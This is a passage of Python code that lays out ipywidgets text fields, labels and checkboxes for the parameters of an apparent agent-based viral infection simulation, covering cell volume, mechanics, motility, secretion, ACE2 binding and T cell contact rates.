box12 = Box(children=row, layout=box_layout)
name_btn = Button(description='lysed_fluid_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float13 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float13, units_btn, ]
box13 = Box(children=row, layout=box_layout)
name_btn = Button(description='cytoplasmic_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float14 = FloatText(value='1.66667e-02', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float14, units_btn, ]
box14 = Box(children=row, layout=box_layout)
name_btn = Button(description='nuclear_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float15 = FloatText(value='5.83333e-03', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float15, units_btn, ]
box15 = Box(children=row, layout=box_layout)
name_btn = Button(description='calcification_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float16 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float16, units_btn, ]
box16 = Box(children=row, layout=box_layout)
name_btn = Button(description='relative_rupture_volume', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float17 = FloatText(value='2.0', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float17, units_btn, ]
box17 = Box(children=row, layout=box_layout)
# -------------------------
div_row3 = Button(description='phenotype:volume', disabled=True, layout=divider_button_layout)
div_row3.style.button_color = 'orange'
name_btn = Button(description='total', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float18 = FloatText(value='2494', step='100', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float18, units_btn, ]
box18 = Box(children=row, layout=box_layout)
name_btn = Button(description='fluid_fraction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float19 = FloatText(value='0.75', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float19, units_btn, ]
box19 = Box(children=row, layout=box_layout)
name_btn = Button(description='nuclear', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float20 = FloatText(value='540', step='10', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float20, units_btn, ]
box20 = Box(children=row, layout=box_layout)
name_btn = Button(description='fluid_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float21 = FloatText(value='0.05', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float21, units_btn, ]
box21 = Box(children=row, layout=box_layout)
name_btn = Button(description='cytoplasmic_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float22 = FloatText(value='0.0045', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float22, units_btn, ]
box22 = Box(children=row, layout=box_layout)
name_btn = Button(description='nuclear_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float23 = FloatText(value='0.0055', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float23, units_btn, ]
box23 = Box(children=row, layout=box_layout)
name_btn = Button(description='calcified_fraction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float24 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float24, units_btn, ]
box24 = Box(children=row, layout=box_layout)
name_btn = Button(description='calcification_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float25 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float25, units_btn, ]
box25 = Box(children=row, layout=box_layout)
name_btn = Button(description='relative_rupture_volume', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float26 = FloatText(value='2.0', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float26, units_btn, ]
box26 = Box(children=row, layout=box_layout)
# -------------------------
div_row4 = Button(description='phenotype:mechanics', disabled=True, layout=divider_button_layout)
div_row4.style.button_color = 'orange'
name_btn = Button(description='cell_cell_adhesion_strength', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float27 = FloatText(value='0.4', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float27, units_btn, ]
box27 = Box(children=row, layout=box_layout)
name_btn = Button(description='cell_cell_repulsion_strength', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float28 = FloatText(value='10.0', step='1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float28, units_btn, ]
box28 = Box(children=row, layout=box_layout)
name_btn = Button(description='relative_maximum_adhesion_distance', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float29 = FloatText(value='1.25', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float29, units_btn, ]
box29 = Box(children=row, layout=box_layout)
self.bool0 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='set_relative_equilibrium_distance', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float30 = FloatText(value='1.8', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [self.bool0, name_btn, self.float30, units_btn, ]
box30 = Box(children=row, layout=box_layout)
self.bool1 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='set_absolute_equilibrium_distance', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float31 = FloatText(value='15.12', step='1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [self.bool1, name_btn, self.float31, units_btn, ]
box31 = Box(children=row, layout=box_layout)
# -------------------------
div_row5 = Button(description='phenotype:motility', disabled=True, layout=divider_button_layout)
div_row5.style.button_color = 'orange'
name_btn = Button(description='speed', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float32 = FloatText(value='4', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='micron/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float32, units_btn]
box32 = Box(children=row, layout=box_layout)
name_btn = Button(description='persistence_time', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float33 = FloatText(value='5', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float33, units_btn]
box33 = Box(children=row, layout=box_layout)
name_btn = Button(description='migration_bias', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float34 = FloatText(value='0.7', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float34, units_btn]
box34 = Box(children=row, layout=box_layout)
self.bool2 = Checkbox(description='enabled', value=False,layout=name_button_layout)
self.bool3 = Checkbox(description='use_2D', value=True,layout=name_button_layout)
chemotaxis_btn = Button(description='chemotaxis', disabled=True, layout={'width':'30%'})
chemotaxis_btn.style.button_color = '#ffde6b'
self.bool4 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.chemotaxis_substrate1 = Text(value='chemokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_substrate1]
box35 = Box(children=row, layout=box_layout)
name_btn = Button(description='direction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.chemotaxis_direction1 = Text(value='1', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_direction1]
box36 = Box(children=row, layout=box_layout)
# -------------------------
div_row6 = Button(description='phenotype:secretion', disabled=True, layout=divider_button_layout)
div_row6.style.button_color = 'orange'
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text0 = Text(value='interferon 1', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text0]
box37 = Box(children=row, layout=box_layout)
name_btn = Button(description='secretion_target', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float35 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless substrate concentration', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float35, units_btn]
box38 = Box(children=row, layout=box_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text1 = Text(value='pro-inflammatory cytokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text1]
box39 = Box(children=row, layout=box_layout)
name_btn = Button(description='secretion_target', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float36 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless substrate concentration', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float36, units_btn]
box40 = Box(children=row, layout=box_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text2 = Text(value='chemokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text2]
box41 = Box(children=row, layout=box_layout)
name_btn = Button(description='secretion_target', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float37 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless substrate concentration', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float37, units_btn]
box42 = Box(children=row, layout=box_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text3 = Text(value='debris', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text3]
box43 = Box(children=row, layout=box_layout)
name_btn = Button(description='secretion_target', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float38 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless substrate concentration', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float38, units_btn]
box44 = Box(children=row, layout=box_layout)
# -------------------------
div_row7 = Button(description='phenotype:molecular', disabled=True, layout=divider_button_layout)
div_row7.style.button_color = 'orange'
# ================== <custom_data>, if present ==================
div_row8 = Button(description='Custom Data',disabled=True, layout=divider_button_layout)
div_row8.style.button_color = 'cyan'
name_btn = Button(description='virion', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float39 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='virions', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='endocytosed virions', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float39, units_btn, description_btn]
box45 = Box(children=row, layout=box_layout)
name_btn = Button(description='uncoated_virion', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float40 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='virions', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='uncoated endocytosed virions', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float40, units_btn, description_btn]
box46 = Box(children=row, layout=box_layout)
name_btn = Button(description='viral_RNA', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float41 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='RNA', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='total (functional) viral RNA copies', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float41, units_btn, description_btn]
box47 = Box(children=row, layout=box_layout)
name_btn = Button(description='viral_protein', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float42 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='protein', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='total assembled sets of viral protein', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float42, units_btn, description_btn]
box48 = Box(children=row, layout=box_layout)
name_btn = Button(description='assembled_virion', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float43 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='total assembled virions', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float43, units_btn, description_btn]
box49 = Box(children=row, layout=box_layout)
name_btn = Button(description='virion_uncoating_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float44 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='rate at which an internalized virion is uncoated', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float44, units_btn, description_btn]
box50 = Box(children=row, layout=box_layout)
name_btn = Button(description='uncoated_to_RNA_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float45 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='rate at which uncoated virion makes its mRNA available', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float45, units_btn, description_btn]
box51 = Box(children=row, layout=box_layout)
name_btn = Button(description='protein_synthesis_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float46 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='rate at mRNA creates complete set of proteins', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float46, units_btn, description_btn]
box52 = Box(children=row, layout=box_layout)
name_btn = Button(description='virion_assembly_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float47 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='rate at which viral proteins are assembled into complete virion', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float47, units_btn, description_btn]
box53 = Box(children=row, layout=box_layout)
name_btn = Button(description='virion_export_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float48 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='rate at which a virion is exported from a live cell', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float48, units_btn, description_btn]
box54 = Box(children=row, layout=box_layout)
name_btn = Button(description='unbound_external_ACE2', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float49 = FloatText(value='1000', step='100', style=style, layout=widget_layout)
units_btn = Button(description='receptors', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='initial number of unbound ACE2 receptors on surface', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float49, units_btn, description_btn]
box55 = Box(children=row, layout=box_layout)
name_btn = Button(description='bound_external_ACE2', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float50 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='receptors', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='initial number of bound ACE2 receptors on surface', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float50, units_btn, description_btn]
box56 = Box(children=row, layout=box_layout)
name_btn = Button(description='unbound_internal_ACE2', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float51 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='receptors', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='initial number of internalized unbound ACE2 receptors', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float51, units_btn, description_btn]
box57 = Box(children=row, layout=box_layout)
name_btn = Button(description='bound_internal_ACE2', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float52 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='receptors', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='initial number of internalized bound ACE2 receptors', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float52, units_btn, description_btn]
box58 = Box(children=row, layout=box_layout)
name_btn = Button(description='ACE2_binding_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float53 = FloatText(value='0.001', step='0.0001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='ACE2 receptor-virus binding rate', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float53, units_btn, description_btn]
box59 = Box(children=row, layout=box_layout)
name_btn = Button(description='ACE2_endocytosis_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float54 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='ACE2 receptor-virus endocytosis rate', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float54, units_btn, description_btn]
box60 = Box(children=row, layout=box_layout)
name_btn = Button(description='ACE2_cargo_release_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float55 = FloatText(value='0.001', step='0.0001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='ACE2 receptor-virus cargo release rate', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float55, units_btn, description_btn]
box61 = Box(children=row, layout=box_layout)
name_btn = Button(description='ACE2_recycling_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float56 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='ACE2 receptor recycling rate', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float56, units_btn, description_btn]
box62 = Box(children=row, layout=box_layout)
name_btn = Button(description='max_infected_apoptosis_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float57 = FloatText(value='0.001', step='0.0001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='maximum rate of cell apoptosis due to viral infection', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float57, units_btn, description_btn]
box63 = Box(children=row, layout=box_layout)
name_btn = Button(description='max_apoptosis_half_max', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float58 = FloatText(value='250', step='10', style=style, layout=widget_layout)
units_btn = Button(description='virion', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='viral load at which cells reach half max apoptosis rate', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float58, units_btn, description_btn]
box64 = Box(children=row, layout=box_layout)
name_btn = Button(description='apoptosis_hill_power', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float59 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='none', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='Hill power for viral load apoptosis response', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float59, units_btn, description_btn]
box65 = Box(children=row, layout=box_layout)
name_btn = Button(description='virus_fraction_released_at_death', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float60 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='none', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='fraction of internal virus released at cell death', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float60, units_btn, description_btn]
box66 = Box(children=row, layout=box_layout)
name_btn = Button(description='infected_cell_chemokine_secretion_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float61 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='max rate that infected cells secrete chemokine', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float61, units_btn, description_btn]
box67 = Box(children=row, layout=box_layout)
name_btn = Button(description='debris_secretion_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float62 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='rate that dead cells release debris', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float62, units_btn, description_btn]
box68 = Box(children=row, layout=box_layout)
name_btn = Button(description='infected_cell_chemokine_secretion_activated', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float63 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='none', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='used internally to track activation of chemokine secretion', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float63, units_btn, description_btn]
box69 = Box(children=row, layout=box_layout)
name_btn = Button(description='TCell_contact_time', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float64 = FloatText(value='0.0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='tracks total contact time with CD8 T cells', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float64, units_btn, description_btn]
box70 = Box(children=row, layout=box_layout)
name_btn = Button(description='cell_attachment_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float65 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='the rate at which the cell attaches to cells in contact', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float65, units_btn, description_btn]
box71 = Box(children=row, layout=box_layout)
name_btn = Button(description='cell_attachment_lifetime', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float66 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='the mean duration of a cell-cell attachment', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float66, units_btn, description_btn]
box72 = Box(children=row, layout=box_layout)
name_btn = Button(description='TCell_contact_death_threshold', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float67 = FloatText(value='50', step='1', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='threshold CD8 T cell contact time to trigger apoptosis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float67, units_btn, description_btn]
box73 = Box(children=row, layout=box_layout)
name_btn = Button(description='max_attachment_distance', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float68 = FloatText(value='15', step='1', style=style, layout=widget_layout)
units_btn = Button(description='micron', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float68, units_btn, description_btn]
box74 = Box(children=row, layout=box_layout)
name_btn = Button(description='elastic_attachment_coefficient', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float69 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='elastic coefficient for cell-cell attachment', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float69, units_btn, description_btn]
box75 = Box(children=row, layout=box_layout)
name_btn = Button(description='phagocytosis_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float70 = FloatText(value='0.167', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float70, units_btn, description_btn]
box76 = Box(children=row, layout=box_layout)
name_btn = Button(description='sensitivity_to_debris_chemotaxis', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float71 = FloatText(value='1.0', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='relative sensitivity to debris in chemotaxis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float71, units_btn, description_btn]
box77 = Box(children=row, layout=box_layout)
name_btn = Button(description='sensitivity_to_chemokine_chemotaxis', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float72 = FloatText(value='10.0', step='1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='relative sensitivity to chemokine in chemotaxis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float72, units_btn, description_btn]
box78 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_speed', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float73 = FloatText(value='0.4', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='micron/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='speed after activation', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float73, units_btn, description_btn]
box79 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_cytokine_secretion_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float74 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
